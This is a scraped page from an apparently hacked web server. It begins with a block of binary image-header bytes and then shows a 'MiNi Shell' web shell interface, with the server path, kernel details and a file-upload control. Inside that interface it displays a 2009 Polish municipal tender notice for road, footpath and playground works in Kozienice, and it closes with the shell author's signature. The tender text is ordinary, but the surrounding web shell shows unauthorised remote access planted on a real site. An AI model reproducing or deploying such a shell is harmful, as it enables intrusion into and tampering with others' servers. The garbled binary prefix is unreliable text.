JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090302/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090302/45178-N-2009.html

<p class="kh_header"><b>Kozienice: Przebudowa ulicy Słonecznej wraz z zagospodarowaniem terenu przy Publicznym Gimnazjum Nr 1 i ciągiem pieszym przy rzece Zagożdżonce</b><br>
<b>Numer ogłoszenia: 45178 - 2009; data zamieszczenia: 02.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Kozienice , ul. Parkowa 5, 26-900 Kozienice, woj. mazowieckie, tel. 048 6117100, faks 048 6142048.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kozienice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Słonecznej wraz z zagospodarowaniem terenu przy Publicznym Gimnazjum Nr 1 i ciągiem pieszym przy rzece Zagożdżonce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zakres prac:                                                                                                   
1.1. Przedmiotem zamówienia jest wykonanie i oddanie obiektu, zrealizowanego zgodnie z dokumentacją projektową pn. Przebudowa ulicy Słonecznej oraz zagospodarowanie terenów przy PG Nr 1. Budowa oświetlenia ulicznego i pn.Zagospodarowanie ciągu pieszego przy rzece Zagożdżonce. Budowa oświetlenia, warunkami określonymi w Szczegółowych specyfikacjach technicznych wykonania i odbioru robót, zasadami wiedzy technicznej i sztuki budowlanej.
1.2. Przedmiotem zamówienia jest przebudowa ulicy Słonecznej wraz  z zagospodarowaniem terenów przy Publicznym Gimnazjum Nr 1, dobudową odcinka kanalizacji deszczowej i przebudową oświetlenia ulicznego; zagospodarowanie ciągu pieszego przy rzece Zagożdżonce - budowa ciągów pieszych, urządzenie terenów zieleni z uwzględnieniem istniejącego drzewostanu, budowa oświetlenia typu parkowego.
2. Przebudowa ulicy Słonecznej wraz z zagospodarowaniem terenów przy Publicznym Gimnazjum Nr 1- zakres rzeczowy:
2.1.	Część drogowa:
2.1.1. Parametry ulicy Słonecznej:
-	przekrój poprzeczny jezdni - uliczny,
-	nawierzchnia klasy D dla kategorii ruchu KR1,
-	szerokość jezdni zróżnicowana 6,00m-dwukierunkowa; 5,00m-jednokierunkoa; 4,50 m-bez przejazdu,
-	długość ulicy - 350 mb
-	zatoki postojowe: dla autobusów (stanowiska 6,00x2,50m); dla samochodów osobowych(5,00x2,50m),
-	ciągi piesze - szerokość 1,50m, 1,80m, 3,00m,
-	przekrój poprzeczny jezdni daszkowy o spadku dwustronnym 2,0% (odcinki 6,00m i 4,50m), jednostronny (odcinek 5,00m).
	2.1.2.Roboty przygotowawcze:
-	wytyczenie trasy drogi,
-	roboty rozbiórkowe,
-	roboty ziemne
2.1.3.Nawierzchnia jezdni:
-	warstwa ścieralna - nawierzchnia z betonu asfaltowego 0/12,8 gr. 4 cm ,
-	warstwa wiążąca - nawierzchnia z betonu asfaltowego 0/12,8 gr. 4 cm,
-	podbudowa z kruszywa łamanego 0-63mm gr 20cm,
-	warstwa odsączająca z piasku gr 10 cm
-	krawężnik betonowy 30x20cm na ławie betonowej z oporem (beton B-15).
2.1.4. Nawierzchnia zjazdów:
-	nawierzchnia z kostki betonowej grafitowej Behaton gr 8 cm na podsypce cementowo-piaskowej gr 4cm,
-	podbudowa z mieszanki betonowej 5 Mpa gr 12cm,
-	warstwa odsączająca z piasku gr. 10 cm,
-	obrzeże betonowe 30x8cm.
2.1.5. Nawierzchnia chodnika:
-	nawierzchnia z kostki betonowej kolorowej Unidekor gr. 6cm na podsypce cementowo-piaskowej gr. 4cm,
-	warstwa odsączająca z piasku gr. 10cm,
-	obrzeże betonowe 30x8cm.
2.1.6. Roboty wykończeniowe:
-	regulacja pionowa studzienek,
-	rozściełanie ziemi urodzajnej i wykonanie trawników dywanowych z nawożeniem.
2.1.7.Oznakowanie:
-	stała organizacja ruchu - oznakowanie pionowe - A-7, B-2, B-36, D-1, D-3, D-4a, D-6,D-18 orza tabliczki T-6a, T-6c, T-23f na słupkach z rury ocynkowanej; znaki wykonane z folii odblaskowej 2 generacji na blasze stalowej ocynkowanej z podwójnie zagiętymi krawędziami;
-	stała organizacja ruchu - oznakowanie poziome
-	tymczasowa organizacja ruchu na czas prowadzenia robót - wykonawca we własnym zakresie i na swój koszt wykona i uzgodni projekt tymczasowej organizacji ruchu i dokona oznakowania. Koszty zajęcia pasa drogowego obciążają wykonawcę.
2.2. Kanalizacja deszczowa:
-	demontaż studzienek ściekowych śr 500mm,-	kanał deszczowy z rur kanalizacyjnych śr. 200x5,9mm typ S łączonych uszczelką gumową,
-	kanał deszczowy z rur śr. 250x7,3mm typ S łączonych uszczelką gumową,
-	ustawienie studni z kręgów betonowych śr. 1200mm,
-	ustawienie studzienek ściekowych śr, 500mm,
-	próba wodna szczelności kanału.
2.3.	Oświetlenie (uliczne):
-	zabudowa szafy oświetlenia,
-	budowa linii YAKY 4x50mm2 i YAKY 4x25mm2,
-	montaż słupów stalowych oświetleniowych 8m,
-	montaż wysięgników stalowych jedno i dwuramiennych,
-	montaż opraw sodowych 100W na słupach stalowych,
-	podłączenie opraw do sieci przewodami YDY 2x2,5-750Vmm2,
-	wymiana słupa krańcowego i przyłączy  na AsXSn 2x16 mm2,
-	wymiana wysięgników z oprawami sodowymi 100W na linii napowietrznej,
-	zabudowa rur osłonowych dwudzielnych na istniejących kablach,
-	wykonanie uziemienia Fe/Zn 25x4.
3.	Zagospodarowanie ciągu pieszego przy rzece Zagożdżonce wraz z budową oświetlenia - zakres rzeczowy:
3.1.	Część drogowa:
-	roboty rozbiórkowe i ziemne,
-	ścięcie drzewa, karczowanie i wywóz karpiny,
-	ciągi piesze szer. 1,50 m,
-	nawierzchnia ciągu pieszego z kostki betonowej kolorowej Nostalit gr. 6cm, na podsypce cementowo-piaskowej gr.4cm i warstwie odsączającej z piasku gr. 10cm
-	obrzeże betonowe grafitowe 30x8cm.
3.2.	Zieleń i mała architektura:
-	obszar nr 1 - zieleniec ograniczony palisadą o wys. 24 cm wypełniony szatą roślinną,
-	obszar nr 2 - plac zabaw o nawierzchni HanseGrand gr. 5 cm, urządzenie do zabawy dla dzieci w wieku 6 -15 lat - zestaw ze ślizgiem o wysokości 1,50m, ławki parkowe żeliwne z siedziskiem drewnianym, pojemniki na śmieci, szata roślinna,
-	obszar nr 3 i 4 - miejsca wypoczynkowe o nawierzchni HanseGrand, ławki parkowe żeliwne z siedziskiem drewnianym, pojemniki na śmieci, szata roślinna
-	obszar nr 5 - plac zabaw o nawierzchni HanseGrand, urządzenie do zabawy dla dzieci w wieku 4-12 lat-zestaw ze ślizgiem o wysokości 1,00m, ławki parkowe żeliwne z siedziskiem drewnianym, pojemniki na śmieci.
Nawierzchnia HanseGrand: grubość 5 cm, podbudowa z kruszywa łamanego 0-31,5mm grubości 12cm i warstwa odsączająca z piasku grubości 10cm. Nawierzchnia ograniczona obrzeżem betonowym grafitowym 30x8cm.
Ławki: pojedyncze z oparciem o wymiarach: wys. 0,75m, szer. 0,55m, dług. 1,80m. Boki żeliwne odlewane, siedziska i oparcie drewniane dębowe. Zakotwienie ławek w gruncie- stałe.
Szata roślinna: zdjęcie warstwy ziemi i rozścielenie ziemi urodzajnej, nasadzenia liściaste (Irga) i iglaste (jałowiec łuskowy i sabiński), pielęgnacja krzewów.
Kosze na śmieci: zakotwione na stałe do podłoża w betonie B-15.Kosze siatkowe z kopułką aluminiową. Wewnątrz  kosza wkład z blachy ocynkowanej z możliwością zakładania worków foliowych.
Zestawy urządzeń zabawowych drewnianych (dostawa i montaż)
-dla dzieci w wieku 6-15 lat - zestaw składający się z wieży zadaszonej, drabinki, pomostu, trapu, zjeżdżalni montowanej do podestu  na wys. 1,50m, liny wspinaczkowej, drążka na linach do podciągania ( zestaw równoważny z zestawem ZC-13)
-dla dzieci w wieku 4-12 lat - zestaw składający się z drabinek wspinaczkowych, zjeżdżalni montowanej do podestu na wys. 1,00m, liny wspinaczkowej, drążka na linach do podciągania (zestaw równoważny z zestawem ZE-6)
3.3.	Oświetlenie (parkowe):
-	budowa linii kablowej YAKY 4x25mm2,
-	montaż słupów stalowych oświetleniowych 4m,
-	montaż opraw metalohalogenkowych 70W na słupach stalowych, 
-	podłączenie opraw do sieci przewodami YDY 750 V 3x2,5mm2,
-	wykonanie uziemienia Fe/Zn 25x4.
4.	Warunki realizacji przedmiotu zamówienia:
4.1.	Roboty będące przedmiotem zamówienia wykonawca wykona kompleksowo zgodnie ze sztuką budowlaną oraz obowiązującymi przepisami i normami.
4.2.	W ramach robót, o których mowa w pkt 2 i 3 Wykonawca:
-	zabezpieczy i oznakuje teren budowy zgodnie z przepisami,
-	dokona urządzenia placu budowy i poniesie koszty utrzymania zaplecza budowy,
-	wykona badania i ekspertyzy na życzenie Zamawiającego,
-	zapewni ochronę terenów przyległych do placu budowy i ponosi odpowiedzialność cywilną za ewentualne szkody wynikłe z tytułu prowadzonych prac wobec osób trzecich,
-	zapewni właścicielom i użytkownikom dojazd do nieruchomości przyległych do placu budowy, w szczególności komunikacji szkolnej dowożącej dzieci do Gimnazjum Publicznego nr 1,
-	roboty ziemne w otoczeniu drzewostanu prowadzić będzie z zachowaniem należnej ostrożności.
4.3.	Przy realizacji umowy Wykonawca zobowiązuje się  stosować materiały i wyroby dopuszczone do   obrotu i powszechnego lub jednostkowego stosowania w budownictwie zgodnie z ustawą Prawo budowlane wraz z dokumentami potwierdzającymi ich jakość. Wykonawca przed zastosowaniem jakichkolwiek materiałów przedstawi inspektorowi nadzoru źródło ich pochodzenia, atesty lub aprobaty techniczne, certyfikaty, deklaracje zgodności, świadectwa badań laboratoryjnych oraz świadectwa dopuszczenia do stosowania w budownictwie. Każdy rodzaj robót, w których znajdą się materiały nie odpowiadające normom i nie zaakceptowane przez Zamawiającego, Wykonawca wykonuje na własne ryzyko, licząc się z jego nie przyjęciem i niezapłaceniem.
4.4.	Zestawy do zabaw dla dzieci muszą posiadać certyfikat zgodności z normami bezpieczeństwa, mają być wykonane z materiałów o wysokim stopniu trwałości, odporne na warunki atmosferyczne, gwarantujące bezpieczne użytkowanie.
4.5.	Wykonawca zobowiązany jest do zawarcia na własny koszt odpowiednich umów ubezpieczenia z tytułu szkód, zdarzeń losowych oraz od odpowiedzialności cywilnej na czas realizacji robót objętych umową. Ubezpieczeniu podlegają w szczególności:
-	roboty objęte umową, urządzenia oraz wszelkie mienie ruchome związane bezpośrednio z wykonawstwem robót,
-	odpowiedzialność cywilna za szkody oraz następstwa nieszczęśliwych wypadków dotyczące pracowników i osób trzecich, powstałe w związku z prowadzonymi robotami, w tym także ruchem pojazdów mechanicznych.
4.6. Wykonawca udzieli Zamawiającemu rękojmi i gwarancji jakości na okres:
-	4 lat dla robót budowlanych, liczony od daty końcowego, bezusterkowego odbioru robót,
-	2 lat dla urządzeń placów zabaw ( zestawy do zabaw, ławki, kosze na śmieci), liczony od końcowego, bezusterkowego odbioru robót,
-	1 roku dla szaty roślinnej ( trawniki i nasadzenia krzewów liściastych i iglastych) liczony od daty końcowego, bezusterkowego odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.10.00.00-8, 45.23.33.30-1, 45.23.32.52-0, 45.23.32.90-8, 45.23.32.00-1, 45.11.27.10-5, 45.23.14.00-9, 45.31.51.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 10000.00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają następujące warunki:
1.1.	posiadają uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć następujące dokumenty:
1.1.1.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ,
1.1.2.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 
1.1.3.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
1.1.4.	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ,
1.2.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują osobami zdolnymi do wykonania niniejszego zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 
W szczególności Wykonawca musi spełniać następujące warunki:
1.2.1.	wykonał w okresie ostatnich 5 lat (przed dniem wszczęcia postępowania), a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej: 
1 robotę budowlaną, której przedmiotem było:
-	wykonanie nawierzchni z mieszanki mineralno-bitumicznej na podbudowie z kruszywa o pow. min. 2000 m2,
-	wykonanie nawierzchni z kostki brukowej betonowej o pow. 1000 m2,
 W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć:
1.2.1.1.	wykaz wykonanych robót sporządzony według wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie. 
1.2.1.2.	Wykaz powinien zawierać opis wykonanych robót w  takim stopniu szczegółowości, by jednoznacznie wskazywał, że Wykonawca spełnia warunek, o którym mowa w pkt 1.2.1.
UWAGA: Za zamówienie wykonane zamawiający rozumie takie zamówienie dla którego wydano co najmniej dokument potwierdzający, że roboty te zostały wykonane należycie lub dokument równoważny. 
1.2.2.	wskaże do uczestniczenia w wykonaniu niniejszego zamówienia kierownika budowy wraz z informacjami na temat jego kwalifikacji zawodowych, niezbędnych do wykonania zamówienia, wykształcenia a także zakresu wykonywania przez niego czynności. 
-	kierownik budowy ma posiadać następujące kwalifikacje: wykształcenie techniczne, uprawnienia budowlane w specjalności konstrukcyjno-budowlanej drogowej do kierowania robotami budowlanymi w zakresie  budowy dróg lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadać aktualną przynależność do właściwej izby samorządu zawodowego. 
-	kierownik robót elektroenergetycznych ma posiadać następujące kwalifikacje: wykształcenie techniczne, uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, posiadać aktualną przynależność do właściwej izby samorządu zawodowego. 
-	W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć: 
1.2.2.1.	wykaz sporządzony według wzoru stanowiącego załącznik nr  3 do niniejszej SIWZ oraz dokumenty potwierdzające, że osoby wskazane do realizacji niniejszego zamówienia posiadają: odpowiednie uprawnienia budowlane i aktualny wpis do właściwej izby samorządu zawodowego. W przypadku nie dysponowania osobą określoną w pkt. 1.2.2. należy dołączyć pisemne zobowiązanie innego podmiotu do udostępnienia osób zdolnych do wykonania zamówienia.
UWAGA: Powyższe uprawnienia muszą być zgodne z Rozporządzeniem Ministra Transportu 
i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych 
w budownictwie (Dz.U. 2006 nr 83 poz. 578 z poźń. zm.) lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 

W przypadku złożenia przez Wykonawców dokumentów zawierających dane w innych walutach niż określono w pkt. 1.2.1., Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs Narodowego Banku Polskiego (NBP) opublikowany z dnia wszczęcia niniejszego postępowania. Ten sam kurs Zamawiający przyjmie przy przeliczaniu wszelkich innych danych finansowych.

2.	Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wraz z ofertą sporządzoną na podstawie wzoru stanowiącego załącznik nr 1 do  SIWZ należy załączyć:

1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 9 ustawy dotyczącą Wykonawcy jako podmiotu - wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy dotyczące wszystkich urzędujących członków władz Wykonawcy, ujawnionych w rejestrze handlowym ( w przypadku spółki cywilnej dotycząca każdego z przedsiębiorców, dla osób fizycznych prowadzących działalność gospodarczą - wystawiona personalnie na ich osobę), wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

4.	Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji organu podatkowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

5.	Aktualne zaświadczenie z właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

6.	Informację o doświadczeniu zawodowym Wykonawcy /doświadczenie zawodowe Wykonawcy/. 
Do informacji winny być dołączone dokumenty potwierdzające, że  wymienione w informacji roboty zostały wykonane należycie (załącznik nr 2 do SIWZ).
7.	Informację o osobach które będą uczestniczyć w wykonywaniu zamówienia /potencjał kadrowy/, (załącznik  nr 3 do SIWZ wraz z dokumentami potwierdzającymi ich uprawnienia i przynależnością do właściwej izby samorządu zawodowego. Jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował, do wykazu winien dołączyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia wraz z dokumentami potwierdzającymi ich uprawnienia i przynależnością do właściwej izby samorządu zawodowego.

8.	Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1ustawy PZP na druku stanowiącym załącznik nr 5.

9.	Wskazanie przez wykonawcę części zamówienia, której wykonanie zamierza powierzyć innemu podmiotowi  (na druku oferty). 

10.	Stosowne Pełnomocnictwo do reprezentacji - jeżeli osoby podpisujące ofertę działają na podstawie pełnomocnictwa - musi zostać ono złożone jako część oferty w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.

11.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego. 

12.	Wykonawca może zastrzec w ofercie, iż Zamawiający nie będzie mógł ujawnić informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji.

13.	Kopię wniesienia wadium ( kopia przelewu, gwarancji itp.)

14.	Kosztorys ofertowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kozienice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2009 godzina 11:45, miejsce: Urząd Miejski w Kozienicach, ul. Parkowa 5, 26-900 Kozienice, pok.nr 111.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com